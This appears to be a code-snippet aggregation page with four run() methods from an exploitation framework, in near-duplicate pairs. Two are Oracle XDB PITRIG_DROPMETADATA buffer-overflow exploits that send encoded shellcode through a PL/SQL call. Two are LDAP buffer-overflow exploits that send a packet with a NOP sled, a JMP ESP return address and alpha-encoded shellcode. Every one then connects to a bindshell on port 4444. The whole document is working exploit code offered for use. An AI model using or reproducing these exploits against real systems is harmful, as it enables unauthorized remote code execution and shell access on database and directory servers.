Example #1
0
    def run(self):
        if self.target == "" or self.target is None:
            self.target = "localhost"

        if self.port == 0 or self.port is None:
            self.port = 1521

        if self.ostype < 1:
            self.gom.echo("[+] No OS selected. Using Linux (ostype = 1)")
            self.ostype = 1

        if self.sid == "":
            self.gom.echo("[+] No sid selected, using ORCL")
            self.sid = "ORCL"

        if self.payload < 1:
            self.gom.echo(
                "[+] No payload selected. Using 'bindshell' (payload = 2)")
            self.payload = 2

        if self.listenPort == 0:
            self.gom.echo("[+] No listen port selected, using 4444")
            self.listenPort = 4444

        link = "%s/%s@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=%s)(PORT=%d)))" % (
            self.user, self.password, self.target, self.port)
        link += "(CONNECT_DATA=(SERVICE_NAME=%s)))" % self.sid
        self.gom.echo(link)

        connection = cx_Oracle.connect(link)
        connection.rollback()
        connection.commit()
        cur = connection.cursor()

        adjustSize = 506
        sc = getShellcode("0.0.0.0", self.listenPort, self.ostype,
                          self.payload)
        sc = x86XorEncode(sc)
        self.gom.echo("[+] Len of encoded shellcode is", len(sc))
        sc = chr(0x27) * (adjustSize - len(sc)) + sc

        addr = "BBBB"
        data = sc
        data += addr
        data += data + "\x27" * (len(data) - 1024)

        cur.execute(
            "BEGIN XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA(OWNER=>:1,NAME=>:2); END;",
            (data, data))

        self.gom.echo("[+] Exploit sended. Connecting to port",
                      self.listenPort)
        time.sleep(3)
        spawnTerminal("localhost", self.listenPort)

        return True
Example #2
0
    def run(self):
        if self.target == "" or self.target is None:
            self.target = "localhost"

        if self.port == 0 or self.port is None:
            self.port = 1521

        if self.ostype < 1:
            print "[+] No OS selected. Using Linux (ostype = 1)"
            self.ostype = 1

        if self.sid == "":
            print "[+] No sid selected, using ORCL"
            self.sid = "ORCL"

        if self.payload < 1:
            print "[+] No payload selected. Using 'bindshell' (payload = 2)"
            self.payload = 2

        if self.listenPort == 0:
            print "[+] No listen port selected, using 4444"
            self.listenPort = 4444

        link = "%s/%s@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=%s)(PORT=%d)))" % (
            self.user,
            self.password,
            self.target,
            self.port,
        )
        link += "(CONNECT_DATA=(SERVICE_NAME=%s)))" % self.sid
        print link

        connection = cx_Oracle.connect(link)
        connection.rollback()
        connection.commit()
        cur = connection.cursor()

        adjustSize = 506
        sc = getShellcode("0.0.0.0", self.listenPort, self.ostype, self.payload)
        sc = x86XorEncode(sc)
        print "[+] Len of encoded shellcode is", len(sc)
        sc = chr(0x27) * (adjustSize - len(sc)) + sc

        addr = "BBBB"
        data = sc
        data += addr
        data += data + "\x27" * (len(data) - 1024)

        cur.execute("BEGIN XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA(OWNER=>:1,NAME=>:2); END;", (data, data))

        print "[+] Exploit sended. Connecting to port", self.listenPort
        time.sleep(3)
        spawnTerminal("localhost", self.listenPort)

        return True
Example #3
0
    def run(self):
        if self.target == "" or self.target is None:
            self.target = "localhost"

        if self.port == 0 or self.port is None:
            self.port = 389

        if self.ostype < 1:
            self.gom.echo("[+] No OS selected. Using Linux (ostype = 1)")
            self.ostype = 1

        if self.payload < 1:
            self.gom.echo(
                "[+] No payload selected. Using 'bindshell' (payload = 2)")
            self.payload = 2

        if self.listenPort == 0:
            self.gom.echo("[+] No listen port selected, using 4444")
            self.listenPort = 4444

        adjustSize = 243
        sc = getShellcode("0.0.0.0", self.listenPort, self.ostype,
                          self.payload)
        sc = x86AlphaEncode(sc)
        sc = "\x90" * (adjustSize - len(sc)) + sc

        #
        # The address we will use is 0xffffe777 (JMP ESP in Debian's linux-gate.so)
        #
        addr = "\x77\xe7\xff\xff"
        theLine = '\x90' * 2076 + addr + '\x90' * (2019 - len(sc)) + sc

        pkt = '0\x82\x10/\x02\x01\x01c\x82\x10(\x04\x82\x10\x06dc='
        pkt += theLine
        pkt += '\n\x01\x02\n\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0bobjectClass0\x00'

        socket.setdefaulttimeout(self.timeout)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((self.target, self.port))
        s.send(pkt)
        s.close()

        self.gom.echo("[+] Exploit sended. Connecting to port",
                      self.listenPort)
        time.sleep(3)
        spawnTerminal("localhost", self.listenPort)

        return True
Example #4
0
    def run(self):
        if self.target == "" or self.target is None:
            self.target = "localhost"
        
        if self.port == 0 or self.port is None:
            self.port = 389
        
        if self.ostype < 1:
            print "[+] No OS selected. Using Linux (ostype = 1)"
            self.ostype = 1
        
        if self.payload < 1:
            print "[+] No payload selected. Using 'bindshell' (payload = 2)"
            self.payload = 2
        
        if self.listenPort == 0:
            print "[+] No listen port selected, using 4444"
            self.listenPort = 4444

        adjustSize = 243
        sc = getShellcode("0.0.0.0", self.listenPort, self.ostype, self.payload)
        sc = x86AlphaEncode(sc)
        sc = "\x90"*(adjustSize-len(sc)) + sc

        #
        # The address we will use is 0xffffe777 (JMP ESP in Debian's linux-gate.so)
        #
        addr = "\x77\xe7\xff\xff"
        theLine = '\x90'*2076 + addr+ '\x90'*(2019-len(sc)) + sc

        pkt  = '0\x82\x10/\x02\x01\x01c\x82\x10(\x04\x82\x10\x06dc='
        pkt += theLine
        pkt += '\n\x01\x02\n\x01\x00\x02\x01\x00\x02\x01\x00\x01\x01\x00\x87\x0bobjectClass0\x00'

        socket.setdefaulttimeout(self.timeout)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((self.target, self.port))
        s.send(pkt)
        s.close()

        print "[+] Exploit sended. Connecting to port", self.listenPort
        time.sleep(3)
        spawnTerminal("localhost", self.listenPort)

        return True